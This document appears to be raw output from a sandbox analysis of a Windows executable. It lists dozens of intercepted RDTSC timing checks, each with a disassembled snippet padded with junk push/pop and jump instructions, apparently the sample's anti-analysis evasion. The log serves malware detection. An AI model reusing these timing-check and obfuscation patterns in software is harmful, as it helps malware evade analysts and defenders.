              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6E3ECB second address: 6E3EDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 pop edi 0x00000009 popad 0x0000000a push eax 0x0000000b push ebx 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6E4345 second address: 6E434B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6E434B second address: 6E434F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6E434F second address: 6E439A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007FCD7C4F0D98h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 0000001Dh 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 adc edx, 55462EF3h 0x0000002b mov edx, ebx 0x0000002d push 0000001Eh 0x0000002f mov dword ptr [ebp+1246EE3Eh], edi 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 je 00007FCD7C4F0D98h 0x0000003e push ebx 0x0000003f pop ebx 0x00000040 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6E44AF second address: 6E44B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6E4615 second address: 6E4619 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6E4619 second address: 6E4623 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FCD7D2AFB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6E46C8 second address: 6E4747 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FCD7C4F0D96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e jmp 00007FCD7C4F0DA9h 0x00000013 jp 00007FCD7C4F0D96h 0x00000019 popad 0x0000001a jnp 00007FCD7C4F0D9Ch 0x00000020 jns 00007FCD7C4F0D96h 0x00000026 popad 0x00000027 nop 0x00000028 push 00000000h 0x0000002a push ecx 0x0000002b call 00007FCD7C4F0D98h 0x00000030 pop ecx 0x00000031 mov dword ptr [esp+04h], ecx 0x00000035 add dword ptr [esp+04h], 00000015h 0x0000003d inc ecx 0x0000003e push ecx 0x0000003f ret 0x00000040 pop ecx 0x00000041 ret 0x00000042 mov cl, D5h 0x00000044 lea eax, dword ptr [ebp+1247F15Bh] 0x0000004a pushad 0x0000004b mov edi, 5958259Fh 0x00000050 mov ecx, dword ptr [ebp+122D20E4h] 0x00000056 popad 0x00000057 nop 0x00000058 push eax 0x00000059 push edx 0x0000005a push edi 0x0000005b jmp 00007FCD7C4F0D9Ch 0x00000060 pop edi 0x00000061 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6E4747 second address: 6C1350 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7D2AFB0Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b jc 00007FCD7D2AFB08h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 pop esi 0x00000014 nop 0x00000015 and ecx, dword ptr [ebp+122D1CD4h] 0x0000001b call dword ptr [ebp+12448774h] 0x00000021 push esi 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FCD7D2AFB12h 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6C1350 second address: 6C135C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 70E752 second address: 70E758 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 70E8BF second address: 70E8C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 70E8C3 second address: 70E90A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 ja 00007FCD7D2AFB06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d jmp 00007FCD7D2AFB11h 0x00000012 pop esi 0x00000013 push edi 0x00000014 je 00007FCD7D2AFB06h 0x0000001a pop edi 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FCD7D2AFB19h 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 70E90A second address: 70E910 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 70E910 second address: 70E914 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 70E914 second address: 70E91A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 70E91A second address: 70E92A instructions: 0x00000000 rdtsc 0x00000002 jp 00007FCD7D2AFB12h 0x00000008 jno 00007FCD7D2AFB06h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 70EA71 second address: 70EA76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 70EBF2 second address: 70EBF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 70ED5B second address: 70ED76 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7C4F0DA0h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 70ED76 second address: 70EDA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pop edx 0x0000000a pushad 0x0000000b popad 0x0000000c pop eax 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 jmp 00007FCD7D2AFB14h 0x00000016 pop ebx 0x00000017 pushad 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 714EEC second address: 714EF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 69B966 second address: 69B96C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 69B96C second address: 69B97F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FCD7C4F0D9Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 713D84 second address: 713D9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FCD7D2AFB06h 0x0000000a jng 00007FCD7D2AFB06h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 pop eax 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 713D9B second address: 713DBD instructions: 0x00000000 rdtsc 0x00000002 jng 00007FCD7C4F0D96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FCD7C4F0DA6h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 713DBD second address: 713DC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 713DC1 second address: 713DC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 713F4D second address: 713F7C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FCD7D2AFB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jg 00007FCD7D2AFB06h 0x00000011 push esi 0x00000012 pop esi 0x00000013 jns 00007FCD7D2AFB06h 0x00000019 jmp 00007FCD7D2AFB15h 0x0000001e popad 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 713F7C second address: 713F82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7148FB second address: 714935 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FCD7D2AFB14h 0x0000000b jne 00007FCD7D2AFB06h 0x00000011 jo 00007FCD7D2AFB06h 0x00000017 jo 00007FCD7D2AFB06h 0x0000001d popad 0x0000001e pushad 0x0000001f jmp 00007FCD7D2AFB0Ah 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 71A042 second address: 71A048 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 71A048 second address: 71A04C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 71A04C second address: 71A050 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 71A050 second address: 71A065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FCD7D2AFB0Bh 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 71F48A second address: 71F48E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 71F723 second address: 71F727 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 71F869 second address: 71F86F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 71F86F second address: 71F89E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCD7D2AFB0Ah 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c jng 00007FCD7D2AFB1Eh 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7208AA second address: 7208AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7208AE second address: 7208E4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FCD7D2AFB0Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e jng 00007FCD7D2AFB06h 0x00000014 pop eax 0x00000015 push edx 0x00000016 jmp 00007FCD7D2AFB18h 0x0000001b pop edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7208E4 second address: 7208E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 72438F second address: 724399 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FCD7D2AFB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7267A5 second address: 7267AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7267AB second address: 7267B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7267B3 second address: 7267B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 729069 second address: 72906F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 72906F second address: 729074 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 729364 second address: 72938B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FCD7D2AFB0Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FCD7D2AFB0Fh 0x00000010 pushad 0x00000011 push edx 0x00000012 pop edx 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 72938B second address: 729391 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 729391 second address: 7293AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FCD7D2AFB11h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7293AD second address: 7293BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jnl 00007FCD7C4F0D9Ah 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7293BE second address: 7293D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCD7D2AFB0Eh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 72D893 second address: 72D8B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCD7C4F0DA0h 0x00000009 jmp 00007FCD7C4F0D9Ah 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 72DF71 second address: 72DF75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 730D62 second address: 730D6E instructions: 0x00000000 rdtsc 0x00000002 ja 00007FCD7C4F0D96h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 731069 second address: 73106D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 73106D second address: 73107B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FCD7C4F0D9Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 73107B second address: 73107F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 73107F second address: 731087 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 731087 second address: 73108B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7370BE second address: 7370C4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7370C4 second address: 7370C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7370C9 second address: 737105 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FCD7C4F0D96h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jmp 00007FCD7C4F0DA9h 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FCD7C4F0DA3h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 737105 second address: 737109 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 737109 second address: 737129 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FCD7C4F0DA6h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 737129 second address: 737133 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FCD7D2AFB06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 735B27 second address: 735B2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 735B2B second address: 735B54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCD7D2AFB12h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007FCD7D2AFB0Ch 0x00000011 jnp 00007FCD7D2AFB06h 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 735DBC second address: 735DC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6E41D0 second address: 6E4207 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FCD7D2AFB08h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pop eax 0x00000013 nop 0x00000014 stc 0x00000015 mov ch, 70h 0x00000017 push 00000004h 0x00000019 mov edi, dword ptr [ebp+122D33BBh] 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FCD7D2AFB11h 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6E4207 second address: 6E420B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6E420B second address: 6E4211 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6E4211 second address: 6E4217 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7361F4 second address: 7361FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7361FA second address: 7361FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 73635F second address: 736365 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 736365 second address: 736396 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jne 00007FCD7C4F0DB8h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 736DB2 second address: 736DBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FCD7D2AFB06h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 736DBC second address: 736DD9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FCD7C4F0DA3h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 736DD9 second address: 736DED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7D2AFB10h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 73FEC0 second address: 73FECA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 740480 second address: 740486 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 740D3B second address: 740D58 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCD7C4F0DA8h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7412E0 second address: 7412F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FCD7D2AFB06h 0x0000000a pop edx 0x0000000b jo 00007FCD7D2AFB34h 0x00000011 push ebx 0x00000012 push eax 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7412F6 second address: 741313 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FCD7C4F0DA0h 0x0000000c jp 00007FCD7C4F0D96h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 741313 second address: 741317 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 744E45 second address: 744E49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 74525A second address: 74525E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 74544D second address: 745451 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
